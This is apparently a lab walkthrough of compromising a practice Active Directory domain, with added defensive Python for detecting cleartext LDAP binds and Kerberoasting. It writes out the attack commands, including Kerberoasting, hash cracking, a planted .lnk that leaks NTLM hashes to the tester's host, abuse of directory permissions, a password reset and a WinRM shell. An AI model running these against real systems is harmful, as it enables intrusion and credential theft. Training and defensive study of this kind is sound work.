Can an application for public service requests lead to full domain compromise? You would probably say no. But you’re wrong. And I am going to show you why.
● Discovering the service account
We were given only an IP address to start from. So I launched a scan to see which ports were open and which services were available.
rustscan -a 10.1.65.124 -- -A
I used rustscan because I like the option to pass nmap flags directly for the open ports. The scan revealed the following results:
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: City Hall - Your Local Government
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-04-07 16:20:34Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: city.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: city.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-CC.city.local
| Issuer: commonName=DC-CC.city.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-26T17:26:36
| Not valid after: 2026-08-28T17:26:36
| MD5: 6b9a:3a36:385d:f60a:43ef:3281:cafa:50fb
| SHA-1: b9ad:bca4:bad8:52b8:732f:3307:7b4b:d035:f389:3ce2
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: CITY
| NetBIOS_Domain_Name: CITY
| NetBIOS_Computer_Name: DC-CC
| DNS_Domain_Name: city.local
| DNS_Computer_Name: DC-CC.city.local
| DNS_Tree_Name: city.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-07T16:21:30+00:00
|_ssl-date: 2026-04-07T16:21:41+00:00; 0s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open msrpc syn-ack Microsoft Windows RPC
49680/tcp open msrpc syn-ack Microsoft Windows RPC
49698/tcp open msrpc syn-ack Microsoft Windows RPC
49709/tcp open msrpc syn-ack Microsoft Windows RPC
49716/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC-CC; OS: Windows; CPE: cpe:/o:microsoft:windows
After adding the corresponding entries to /etc/hosts, I started with the most interesting items I found, the shared drives (port 445) and the website (port 80).
Unfortunately, anonymous login didn’t reveal any shared drive, so I had to leave that for the moment.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $smbclient -L \\\\city.local
Password for [WORKGROUP\rootshellace]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to city.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Since I didn’t get anything useful, I started browsing the website, looking for possible attack paths. An initial scan with gobuster revealed a sub-directory named uploads. This was useful in a later step.
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 24118]
/uploads (Status: 301) [Size: 149] [--> http://city.local/uploads/]
Progress: 4614 / 4615 (99.98%)
The website didn’t look very interesting until I got to a page where you could download an application, for both Linux and Windows, to submit various form requests. The executables were available here: http://city.local/documents-forms.html.
I ran strings on both files, in an attempt to find possible hard-coded elements. I found a token and something looking like a hash, but couldn’t do anything with them.
The next step I took was to simulate submitting a dummy request from the app and see what happens. Now, here is where I found the first handy item. The application had a logging screen and the name of a used service account was displayed.
[20:12:06] Application form loaded. Please complete all required fields.
[20:12:06] Service: Public Works Service Request
[20:12:06] System ready for form validation and processing.
[20:12:59] Validating application form...
[20:12:59] Connecting to City Council Directory Services...
[20:12:59] Using dedicated service account: svc_services_portal
[20:13:01] Performing LDAP bind request - Portal Service Authentication...
[20:13:02] Performing Search: citizen records database...
[20:13:03] Performing Validate: application eligibility criteria...
[20:13:04] Performing Update: service request tracking system...
[20:13:05] Performing Log: public services audit trail...
[20:13:05] Performing Verify: resident information consistency...
[20:13:06] Performing Process: automated workflow routing...
[20:13:07] Performing Update: municipal service database...
[20:13:07] Authenticating service account with DC-CC.city.local...
[20:13:07] ✓ Directory service authentication completed
[20:13:07] ✓ Application validated successfully
[20:13:07] ✓ Service request processed and logged
[20:13:07] ✓ Workflow routing completed
[20:13:07] ✓ Database update successful
I tested svc_services_portal user with an empty password. The test failed, but it confirmed I got a valid user.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u svc_services_portal -p ''
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [-] city.local\svc_services_portal: STATUS_LOGON_FAILURE
● Obtaining the password for the service account
I initially tried to use as a password the token I found using strings, but it didn’t work. So, how do we get the password?
Since the authentication was done automatically when executing the app locally, I intercepted the traffic using Wireshark, then followed the corresponding stream and got the password for the service account.
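Why the stream was readable, as an added example that is not part of the original writeup: assuming the application performs an LDAP simple bind on port 389 without TLS, the password travels as a raw octet string under context tag [0] of the BindRequest. The Python below parses a BindRequest the way a network sensor could, keeps only the credential length, and classifies the bind; the sample messages, DN and function names are constructed for illustration.

```python
"""Classify LDAP BindRequests seen on the wire (added example, constructed data)."""
from dataclasses import dataclass


class BERError(ValueError):
    """A BER element is truncated or uses an unsupported length."""


def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER element starting at pos."""
    if pos + 2 > len(buf):
        raise BERError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                        # short form: the octet is the length
        length = first
    else:                                   # long form: low 7 bits count the length octets
        count = first & 0x7F
        if count == 0 or count > 4 or pos + count > len(buf):
            raise BERError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    if pos + length > len(buf):
        raise BERError("truncated value")
    return tag, buf[pos:pos + length], pos + length


@dataclass
class BindInfo:
    message_id: int
    bind_dn: str
    method: str        # "simple", "sasl" or "other"
    secret_len: int    # length only; the credential bytes are never stored
    mechanism: str     # SASL mechanism name, empty for simple binds


def parse_bind_request(payload):
    """Parse one LDAPMessage; return BindInfo for a BindRequest, else None."""
    try:
        tag, msg, _ = read_tlv(payload, 0)
        if tag != 0x30:                     # LDAPMessage ::= SEQUENCE
            return None
        tag, msg_id, pos = read_tlv(msg, 0)
        if tag != 0x02:                     # messageID INTEGER
            return None
        tag, op, _ = read_tlv(msg, pos)
        if tag != 0x60:                     # [APPLICATION 0] BindRequest
            return None
        _, _, pos = read_tlv(op, 0)         # protocol version, not needed here
        tag, name, pos = read_tlv(op, pos)
        if tag != 0x04:                     # bind name (DN) OCTET STRING
            return None
        auth_tag, auth, _ = read_tlv(op, pos)
        method, secret_len, mechanism = "other", 0, ""
        if auth_tag == 0x80:                # simple [0]: the value is the password itself
            method, secret_len = "simple", len(auth)
        elif auth_tag == 0xA3:              # sasl [3] SEQUENCE { mechanism, credentials }
            _, mech_raw, nxt = read_tlv(auth, 0)
            method, mechanism = "sasl", mech_raw.decode("ascii", "replace")
            if nxt < len(auth):
                secret_len = len(read_tlv(auth, nxt)[1])
    except BERError:
        return None
    return BindInfo(int.from_bytes(msg_id, "big"), name.decode("utf-8", "replace"),
                    method, secret_len, mechanism)


def assess(info, tls):
    """Label a bind; tls says whether the connection was LDAPS or had StartTLS applied."""
    if info.method != "simple":
        return "sasl"                       # signing cannot be judged from the bind alone
    if info.secret_len == 0:
        return "anonymous-or-unauthenticated"
    return "simple-over-tls" if tls else "cleartext-password"


def tlv(tag, value):
    """Encode one BER element; used only to build the constructed samples."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    size = (n.bit_length() + 7) // 8
    return bytes([tag, 0x80 | size]) + n.to_bytes(size, "big") + value


def build_bind(msg_id, dn, auth):
    """Assemble an LDAPv3 BindRequest around an already encoded authentication choice."""
    op = tlv(0x02, b"\x03") + tlv(0x04, dn.encode()) + auth
    return tlv(0x30, tlv(0x02, bytes([msg_id])) + tlv(0x60, op))


# Constructed samples: placeholder DN and secret, not values from the lab.
SAMPLE_SIMPLE = build_bind(1, "CN=svc_example,OU=Service Accounts,DC=example,DC=test",
                           tlv(0x80, b"placeholder-secret"))
SAMPLE_SASL = build_bind(2, "", tlv(0xA3, tlv(0x04, b"GSS-SPNEGO") + tlv(0x04, b"\x60" * 200)))

if __name__ == "__main__":
    for sample in (SAMPLE_SIMPLE, SAMPLE_SASL):
        info = parse_bind_request(sample)
        print(info, "->", assess(info, tls=False))
```

Requiring LDAP signing on the domain controller rejects simple binds on cleartext connections; moving the client to LDAPS or a signed SASL bind keeps the password off the wire.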
I tested the credential pair and got the confirmation that they are valid.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u svc_services_portal -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\svc_services_portal:<REDACTED>
● Get the Active Directory structure using BloodHound
Having a valid pair of credentials, I used it to get an idea of how Active Directory was structured for that entity.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $bloodhound-python -u svc_services_portal -p <REDACTED> -ns 10.1.65.124 -d city.local -c All
Once I obtained the archive containing the .json files, I imported it in BloodHound. I checked if svc_services_portal had any interesting permissions or was part of any useful groups, but nothing came up.
This account looked like a dead end, so I moved on checking if there were any Kerberoastable users. I found clerk.john.
● Get access as clerk.john
The first step was to get the Kerberos hash for this user. I used GetUserSPNs script from impacket.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $impacket-GetUserSPNs city.local/svc_services_portal:<REDACTED> -dc-ip 10.1.65.124 -request
Once I got it, I passed it to john to crack it.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt john_clerk_hash_krb.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (?)
1g 0:00:00:02 DONE (2026-04-07 21:37) 0.3816g/s 729306p/s 729306c/s 729306C/s clouds96..clenol
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
To make sure the password was OK, I tested the credentials.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u clerk.john -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\clerk.john:<REDACTED>
I went back to BloodHound to verify this new user, but it didn’t have any useful access.
● Get access as jon.peters
Because BloodHound didn’t reveal any lead, I went back to the shared drives and enumerated again, this time as clerk.john.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $smbclient -L \\city.local -U clerk.john
Password for [WORKGROUP\clerk.john]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Uploads Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to city.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Well, better than anonymous login, at least I had something to work with. On Backups drive I got a Permission Denied error when attempting to connect, but I was able to map the Uploads directory. Inside, among other files, I found an email from Emma Hayes. It was mentioned that write access was granted to Jon Peters on this drive and NTLM authentication was used.
The next step was to start a listener, with responder, on the VPN interface I was using for the challenge.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $sudo responder -I tun0
Then, I created a fake .lnk file, using ntlm_theft.py - available here
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $python3 ~/Tools/ntlm_theft/ntlm_theft.py -g lnk -s <MY_VPN_IP> -f fake_note
Finally, I deployed it on the Uploads shared drive. After a couple of seconds, in the terminal where the listener was launched, I got the NTLMv2 hash for jon.peters.
[SMB] NTLMv2-SSP Client : 10.1.65.124
[SMB] NTLMv2-SSP Username : CITY\jon.peters
[SMB] NTLMv2-SSP Hash : <REDACTED>
I went back to john, to crack this new hash and obtain the corresponding password.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $john jon_peters_ntlm_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (jon.peters)
1g 0:00:00:10 DONE (2026-06-26 15:28) 0.09451g/s 1260Kp/s 1260Kc/s 1260KC/s 1234ถ6789..1234dork
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Again, I wanted to verify if the login was OK.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u jon.peters -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\jon.peters:<REDACTED>
I got the confirmation that everything was fine with the access for this user.
● Lateral movement to nina.soto
Since I obtained a new set of credentials, I returned to BloodHound to see what I could find. Still no useful group membership, but jon.peters had GenericWrite access on 3 different users: maria.clerk, paul.roberts and nina.soto.
I used targetedKerberoast.py tool (available here) to obtain the Kerberos hash for these 3 users.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $~/Tools/targetedKerberoast/targetedKerberoast.py -v -d 'city.local' -u 'jon.peters' -p '<REDACTED>' --dc-ip 10.1.65.124
Then, passed all 3 hashes to john, for cracking.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $john --format=krb5tgs three_hash_krb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<MARIA_PWD_REDACTED> (?)
<NINA_PWD_REDACTED> (?)
2g 0:00:00:20 DONE (2026-06-26 15:58) 0.09652g/s 692266p/s 1614Kc/s 1614KC/s !!12Honey..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
I was able to get the passwords only for 2 of the 3 users. However, it was something I could work with. But I had to test them before, to confirm they were OK, and the confirmation came.
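Both Kerberoasting steps on this page (clerk.john earlier, and the GenericWrite-driven run against the three users above) surface on the domain controller as service-ticket requests encrypted with etype 23, and the targeted variant additionally as an SPN written to a user object just before the request. The Python below is an added detection example, not part of the original writeup; the events are constructed samples keyed by Security-log field names, and WINDOW and the function names are assumptions.

```python
"""Kerberoasting triage over DC Security events (added example, constructed data)."""
from datetime import datetime, timedelta

RC4_HMAC = 0x17                   # etype 23, the type john reported on this page
SPN_VALUE_ADDED = "%%14674"       # OperationType of a 5136 "value added" record
WINDOW = timedelta(seconds=120)   # assumption: SPN write and ticket request are close together

# Constructed sample events, not the lab's logs. Keys follow the fields of events
# 4769 (service ticket requested) and 5136 (directory object modified). 5136 is only
# logged when directory-change auditing and a SACL cover the modified object.
EVENTS = [
    # Plain Kerberoast: a domain user requests a ticket for a user account that has an SPN.
    {"EventID": 4769, "TimeCreated": "2026-01-01T09:00:00", "Status": "0x0",
     "TargetUserName": "svc_services_portal@CITY.LOCAL", "ServiceName": "clerk.john",
     "TicketEncryptionType": "0x17"},
    # Ordinary traffic: AES ticket for a machine account.
    {"EventID": 4769, "TimeCreated": "2026-01-01T09:05:00", "Status": "0x0",
     "TargetUserName": "maria.clerk@CITY.LOCAL", "ServiceName": "DC-CC$",
     "TicketEncryptionType": "0x12"},
    # Targeted variant: SPN added to a user object, RC4 ticket requested, SPN removed.
    {"EventID": 5136, "TimeCreated": "2026-01-01T10:00:00", "SubjectUserName": "jon.peters",
     "ObjectClass": "user", "ObjectDN": "CN=nina.soto,OU=ExampleOU,DC=city,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "%%14674"},
    {"EventID": 4769, "TimeCreated": "2026-01-01T10:00:02", "Status": "0x0",
     "TargetUserName": "jon.peters@CITY.LOCAL", "ServiceName": "nina.soto",
     "TicketEncryptionType": "0x17"},
    {"EventID": 5136, "TimeCreated": "2026-01-01T10:00:03", "SubjectUserName": "jon.peters",
     "ObjectClass": "user", "ObjectDN": "CN=nina.soto,OU=ExampleOU,DC=city,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "%%14675"},
]


def when(event):
    return datetime.fromisoformat(event["TimeCreated"])


def rc4_ticket_requests(events):
    """Successful 4769 requests, RC4-encrypted, for services that run as user accounts."""
    hits = []
    for ev in events:
        if ev["EventID"] != 4769 or ev.get("Status") != "0x0":
            continue
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        service = ev["ServiceName"].lower()
        if service.endswith("$") or service == "krbtgt":   # machine accounts and the KDC
            continue
        hits.append(ev)
    return hits


def spn_additions(events):
    """5136 records in which an SPN value was added to a user object."""
    return [ev for ev in events
            if ev["EventID"] == 5136 and ev.get("ObjectClass") == "user"
            and ev.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"
            and ev.get("OperationType") == SPN_VALUE_ADDED]


def detect(events):
    """Return one finding per suspicious ticket request, upgraded when the requester
    wrote an SPN on a user object within WINDOW before the request."""
    writes = spn_additions(events)
    findings = []
    for req in rc4_ticket_requests(events):
        requester = req["TargetUserName"].split("@")[0].lower()
        written = [w["ObjectDN"] for w in writes
                   if w["SubjectUserName"].lower() == requester
                   and timedelta(0) <= when(req) - when(w) <= WINDOW]
        findings.append({
            "kind": "targeted-kerberoast" if written else "rc4-service-ticket",
            "requester": requester,
            "service": req["ServiceName"],
            "time": req["TimeCreated"],
            "spn_written_on": written,
        })
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Restricting SPN-bearing accounts to AES and giving them long random passwords removes what made both cracks quick here; reviewing who holds GenericWrite over user objects closes the targeted variant.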
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u maria.clerk -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\maria.clerk:<REDACTED>
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u nina.soto -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\nina.soto:<REDACTED>
● Pivoting from emma.hayes to sam.brooks and getting the user flag
I reexamined the shared drive permissions, this time with the 2 newly found accounts. Although maria.clerk didn’t have anything interesting, for nina.soto, I noticed there was read access on Backups.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $smbmap -u nina.soto -p <REDACTED> -H city.local
 ________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.1.65.124:445 Name: city.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Uploads NO ACCESS
[*] Closed 1 connections
I connected to that shared drive and found some backup profiles for clerk.john and sam.brooks. I downloaded them on my local machine. Initially, the download of the file for clerk.john was failing due to a timeout error, but I managed to fix this by adding -m SMB2 parameter to the initial smbclient command.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $smbclient \\\\city.local\\Backups -U nina.soto
Password for [WORKGROUP\nina.soto]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Oct 30 18:55:14 2025
.. D 0 Thu Oct 30 18:55:14 2025
Documents Backup Dn 0 Thu Oct 30 18:55:14 2025
UserProfileBackups Dn 0 Thu Oct 30 20:55:27 2025
12966143 blocks of size 4096. 8391255 blocks available
smb: \> cd UserProfileBackups
smb: \UserProfileBackups\> dir
. Dn 0 Thu Oct 30 20:55:27 2025
.. Dn 0 Thu Oct 30 20:55:27 2025
clerk.john_ProfileBackup_0729.wim An 69883158 Thu Oct 30 18:23:22 2025
sam.brooks_ProfileBackup_0728.wim A 130326 Thu Oct 30 20:55:12 2025
12966143 blocks of size 4096. 8391254 blocks available
smb: \UserProfileBackups\> get sam.brooks_ProfileBackup_0728.wim
getting file \UserProfileBackups\sam.brooks_ProfileBackup_0728.wim of size 130326 as sam.brooks_ProfileBackup_0728.wim (90,4 KiloBytes/sec) (average 90,4 KiloBytes/sec)
smb: \UserProfileBackups\> get clerk.john_ProfileBackup_0729.wim
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \UserProfileBackups\> getting file \UserProfileBackups\clerk.john_ProfileBackup_0729.wim of size 69883158 as clerk.john_ProfileBackup_0729.wim SMBecho failed (NT_STATUS_CONNECTION_DISCONNECTED). The connection is disconnected now
To see what was available on those 2 profiles, I installed wimtools. You could either extract them locally, or map them. I chose to extract them, then navigated through the available content.
Inside the profile of sam.brooks, I found an email mentioning web_admin account, which was moved to Quarantine OU due to some security concerns. Also, another mention was made related to the web server, which had ASP.NET enabled and file uploads of .aspx pages were possible. This helped me later.
For clerk.john, I found another email from Emma Hayes, where she mentioned she would share her credentials to be used for urgent tasks while she was on vacation. Those were stored in Credential Manager. I found some corresponding key files, but also the PowerShell History file for the console log. After examining it, I got the plaintext credentials of emma.hayes.
cmdkey /add:city-dc /user:city.local\emma.hayes /pass:<REDACTED>
cmdkey /add:DC-CC.city.local /user:emma.hayes /pass:<REDACTED>
Of course, I tested the connection with the new pair and got the confirmation that it was all good.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u emma.hayes -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\emma.hayes:<REDACTED>
Back to BloodHound, looking for useful access on Emma. Over there, I found out she had WriteDacl rights on CityOps OU and 3 other users: sam.brooks, alex.king and rita.cho. I used that permission to grant FullControl for her on CityOps, using dacledit.py.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $sudo ./dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'emma.hayes' -target-dn 'OU=CITYOPS,DC=CITY,DC=LOCAL' 'city.local'/'emma.hayes':<REDACTED>
Then, I looked over all those 3 users under CityOps OU and their permissions. The one that proved to be the most useful was sam.brooks, because it was part of Remote Management Users. First, I had to enable it, since it was disabled.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $bloodyAD --host 10.1.65.124 -d 'city.local' -u 'emma.hayes' -p <REDACTED> remove uac 'sam.brooks' -f ACCOUNTDISABLE
[+] ['ACCOUNTDISABLE'] property flags removed from sam.brooks's userAccountControl
Next, I reset the password for this account, using the same tool as previously, bloodyAD.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $bloodyAD -u 'emma.hayes' -p <REDACTED> -d 'city.local' --host 10.1.65.124 set password 'sam.brooks' 'Password123'
[+] Password changed successfully!
Finally, I tested it and made sure the credentials were valid.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u sam.brooks -p Password123
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\sam.brooks:Password123
Since this user was a member of Remote Management Users, I connected to the machine using evil-winrm and got the user flag located on Desktop.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $evil-winrm -i 10.1.65.124 -u sam.brooks -p Password123
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sam.brooks\Documents> whoami
city\sam.brooks
*Evil-WinRM* PS C:\Users\sam.brooks\Documents> dir
*Evil-WinRM* PS C:\Users\sam.brooks\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\sam.brooks\Desktop> dir
Directory: C:\Users\sam.brooks\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/24/2025 11:57 AM 1594 user.txt
*Evil-WinRM* PS C:\Users\sam.brooks\Desktop> type user.txt
<REDACTED_FLAG>
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡰⠚⠉⠀⠀⠉⠑⢦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠞⠀⠀⠀⠀⠀⠀⠀⠀⠱⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⡀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⡜⠀⠀⠀⠀⠀⣀⣀⠀⠀⠀⠀⠀⢣⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⣠⠔⠋⠉⣩⣍⠉⠙⠢⣄⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢧⡜⢏⠓⠒⠚⠁⠈⠑⠒⠚⣹⢳⡸⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠘⣆⠸⡄⠀⠀⠀⠀⠀⠀⢠⠇⣰⠃⠀⠀⠀⠀⠀⠀⠀⠀
